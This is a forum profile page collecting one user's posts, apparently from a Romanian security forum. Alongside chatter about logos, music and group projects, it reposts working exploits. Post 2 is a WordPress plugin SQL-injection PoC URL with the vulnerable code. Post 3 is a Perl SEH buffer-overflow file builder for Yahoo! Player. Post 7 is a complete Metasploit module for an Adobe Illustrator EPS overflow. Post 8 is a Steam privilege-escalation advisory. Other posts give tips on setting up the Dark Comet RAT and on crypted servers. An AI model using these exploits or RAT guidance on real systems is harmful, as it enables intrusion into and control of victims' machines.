Gabriel87

Active Members
  • Posts

    860

Everything posted by Gabriel87

  1. These are more web banners than logos; as Gecko also said, logos are made as vectors.. and without images or resources from the Net; only then can you call it a logo. @kozy, it can be done in both PS and AI
  2. # Exploit Title: WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability
     # Date: 2011-08-28
     # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
     # Software Link: http://downloads.wordpress.org/plugin/fbpromotions.1.3.3.zip
     # Version: 1.3.3 (tested)
     # Note: magic_quotes has to be turned off

     ---
     PoC
     ---
     http://www.site.com/wp-content/plugins/fbpromotions/fbActivate.php?action=activate&name=test&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

     ---------------
     Vulnerable code
     ---------------
     if($_REQUEST['action']=="activate"){
         $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']);
         ...
         $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'";

     Source: WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability
  3. #!/usr/bin/perl
     # Exploit Title: yahoo! player 1.5 (.m3u) Universal Buffer Overflow (SEH)
     # Date: 27/08/2011
     # Author: D3r K0n!G
     # Software Link: http://www.clubic.com/lancer-le-telechargement-8059-0-yahoo-player.html
     # Version: 1.5.01.409
     # Tested on: Windows XP SP3
     # CVE : N/A
     # Greets to: All my friends (DZ) & all members of www.se4ever.com & www.h4kz.net

     my $file   = "yahoo.m3u";
     my $junk   = "\x41" x 2049;
     my $nexseh = "\xeb\x10\x90\x90";       # Short jump
     my $seh    = pack ('V',0x300117f7);    # POP POP RET => DUNZIP32.dll
     my $junk2  = "\x90" x 12;

     #windows/exec EXITFUNC=seh CMD=calc.exe R | msfencode -e x86/alpha_upper -t c
     my $shellcode = "";                    # encoded payload bytes omitted

     open(my $File, ">", $file) or die "cannot open $file: $!";
     print $File $junk.$nexseh.$seh.$junk2.$shellcode;
     close($File);

     Source: yahoo! player 1.5 (.m3u) Universal Buffer Overflow (SEH)
  4. Gabriel87

    Request

    Did you read the forum rules before posting? Apparently not: http://rstcenter.com/forum/8703-lista-cu-cele-mai-frecvente-intrebari-raspunsurile-la-ele.rst 4. Can you help me steal or break into an ID/site? Answer: These requests will certainly mean a permanent ban from the forum. WE DO NOT ALLOW these requests to be posted on the public part of the forum, nor to be made through private messages to other users.
  5. @DEFENDOR That's why I edited the post, because I don't know what the first Dj Bl3nd remix was called, but I listen to Dj Bl3nd too
  6. Timati feat Snoop Dogg - Groove on ( Official Music Video ) New 2009 HQ - YouTube
  7. ##
     # $Id: adobe_illustrator_v14_eps.rb 10477 2010-09-25 11:59:02Z mc $
     ##

     ##
     # This file is part of the Metasploit Framework and may be subject to
     # redistribution and commercial restrictions. Please see the Metasploit
     # Framework web site for more information on licensing and terms of use.
     # http://metasploit.com/framework/
     ##

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = GreatRanking

       include Msf::Exploit::FILEFORMAT

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Adobe Illustrator CS4 v14.0.0',
           'Description'    => %q{
               Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
               overlong DSC Comment Buffer Overflow Exploit
           },
           'License'        => MSF_LICENSE,
           'Author'         => [ 'Nine:Situations:Group::pyrokinesis', 'dookie' ],
           'Version'        => '$Revision: 10477 $',
           'References'     =>
             [
               [ 'CVE', '2009-4195' ],
               [ 'BID', '37192' ],
               [ 'OSVDB', '60632' ],
               [ 'URL', 'http://retrogod.altervista.org/9sg_adobe_illuso.html' ],
               [ 'URL', 'http://www.exploit-db.com/exploits/10281' ],
             ],
           'DefaultOptions' =>
             {
               'EXITFUNC' => 'seh',
               'DisablePayloadHandler' => 'true',
             },
           'Payload'        =>
             {
               'Space'       => 1000,
               'BadChars'    => "\x00\x0D\x0C\x0A",
               'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
             },
           'Platform'       => 'win',
           'Targets'        =>
             [
               [ 'Windows Universal', { 'Ret' => 0x4B4B5173 } ], # CALL ESI in icudt36.dll
             ],
           'Privileged'     => false,
           'DisclosureDate' => 'Dec 03 2009',
           'DefaultTarget'  => 0))

         register_options(
           [
             OptString.new('FILENAME', [ false, 'The file name.', 'msf.eps']),
           ], self.class)
       end

       def exploit
         header = "\xc5\xd0\xd3\xc6\x20\x00\x00\x00\x05\xc8\x04\x00\x00\x00"
         header << "\x00\x00\x00\x00\x00\x00%\xc8\x04\x00\xb5I\x01\x00\xff"
         header << "\xff\x00\x00"
         header << "%!PS-Adobe-3.1\x20EPSF-3.0\r\n"
         header << "%ADO_DSC_Encoding:\x20Windows\x20Roman\r\n"
         header << "%"

         sploit = rand_text_alpha(41699)
         sploit << [target.ret].pack('V')
         sploit << rand_text_alpha(2291)
         sploit << "%Title:\x20Untitled-1.eps\r\n"
         sploit << "%AAAAAAAA"
         sploit << payload.encoded

         trailer = ": \nA\r\n"
         trailer << "%%For:\x20alias\r\n"
         trailer << "%%CreationDate:\x2011/27/2009\r\n"
         trailer += "%%BoundingBox:\x200\x200\x20227\x20171\r\n"
         trailer += "%%HiResBoundingBox:\x200\x200\x20226.5044\x20170.3165\r\n"
         trailer += "%%CropBox:\x200\x200\x20226.5044\x20170.3165\r\n"
         trailer += "%%LanguageLevel:\x202\r\n"
         trailer += "%%DocumentData:\x20Clean7Bit\r\n"
         trailer += "%ADOBeginClientInjection:\x20DocumentHeader\x20\"AI11EPS\"\r\n"
         trailer += "%%AI8_CreatorVersion:\x2014.0.0\r"
         trailer += "%AI9_PrintingDataBegin\r"
         trailer += "%ADO_BuildNumber:\x20Adobe\x20Illustrator(R)\x2014.0.0\x20x367\x20R\x20agm\x204.4890\x20ct\x205.1541\r"
         trailer += "%ADO_ContainsXMP:\x20MainFirst\r"
         trailer += "%AI7_Thumbnail:\x20128\x2096\x208\r"
         trailer += "%%BeginData:\x204096\x20Hex\x20Bytes\r"
         trailer += "%0000330000660000990000CC0033000033330033660033990033CC0033FF\r\n"

         eps = header + sploit + trailer

         print_status("Creating '#{datastore['FILENAME']}' file ...")
         file_create(eps)
       end
     end
  8. Valve Steam Client Application v1559/1559 Local Privilege Escalation

     Vendor: Valve Corporation
     Product web page: http://www.steampowered.com
     Affected version: Built: Jun 1, 2011 at 15:31:24
                       Steam API: v010
                       Steam package versions 1559 / 1559
                       File version: 1.0.968.628

     Summary: Steam is a digital distribution, digital rights management, multiplayer and communications platform developed by Valve Corporation. It is used to distribute games and related media online, from small independent developers to larger software houses. Steam also has community features, automated game updates, and in-game voice and chat functionality.

     Desc: Steam is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exists due to the improper permissions, with the "F" flag (Full Control) for the "Users" group, for the binary file Steam.exe, GameOverlayUI.exe and steamerrorreporter.exe. The binary (Steam.exe) is set by default to Startup with "-silent" parameter.

     Tested on: Microsoft Windows XP Professional SP3 (EN)

     Vendor status: 24.06.2011 - Vulnerability discovered.
                    25.06.2011 - Initial contact with the vendor.
                    25.06.2011 - Auto-reply from the vendor stating that the message is received.
                    28.06.2011 - No reply from the vendor.
                    29.06.2011 - Public security advisory released.

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
     liquidworm gmail com

     Advisory ID: ZSL-2011-5022
     Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5022.php

     24.06.2011

     ------------------------------------------------------------

     C:\Program Files\Steam>cacls Steam.exe
     C:\Program Files\Steam\Steam.exe BUILTIN\Users:F <---
                                      NT AUTHORITY\SYSTEM:F
                                      BUILTIN\Power Users:C
                                      BUILTIN\Administrators:F
                                      LABPC\User101:F
  9. So what business is it of yours? Maybe he has made it private now. Why does it bother you that it says "Working on.." and it is no longer public or no longer works? Learn programming and make a tool yourselves; stop waiting for someone to hand you everything on a platter. PS: Don't take it the wrong way, I have nothing against you
  10. That means he is working on it
  11. Cumicu - Mii de ganduri. - YouTube
  12. I'll come up with a version tomorrow too; I'm not home right now
  13. @Gecko, it would be good for us to make a group on Gmail to talk about projects, or a conference on Messenger. Edit: Gecko, you have a PM
  14. I don't think so, maybe he has fans too; I only heard of him just now, with this news: The hacker Micul Fum has been caught. For those curious what "Micul Fum" looks like
  15. @25aug, if you don't even know how to set up a RAT, then what do you want a RAT for? Note that for other versions of Dark Comet there are tutorials on how to set it up, and you can follow that. @XgaMeR, well, save everything you have set in the RAT and after that its settings will no longer disappear
  16. I didn't know Gecko had joined too, but we do all kinds if anyone wants. Edit: Surge, then that's very good, we'll do a wonderful job together, especially since Gecko also knows how to code html + css
  17. Thanks, did you catch anything with it? What IP has to be entered? Edit: Thanks
  18. @Surge, don't worry, that's why there are 3 of us in the group, including you; robert and I will do it.... that's not the problem, but let's do something for RST so we don't sit around doing nothing
  19. Yes, of course we'll help, but signatures are pointless; maybe some "No avatar" images. Edit: Or for you, Wav3, when you make more programs in VB, some images would work, and for others too
  20. Specii - Farmacia de la colt - YouTube
  21. Can you upload it to another host? "The file you are trying to access is temporarily unavailable. Please try again later."
  22. Gabriel87

    Well done

    Malwarebytes won't help you at all if the server is 100% crypted; better to format Windows and after that put Malwarebytes and Avira on the PC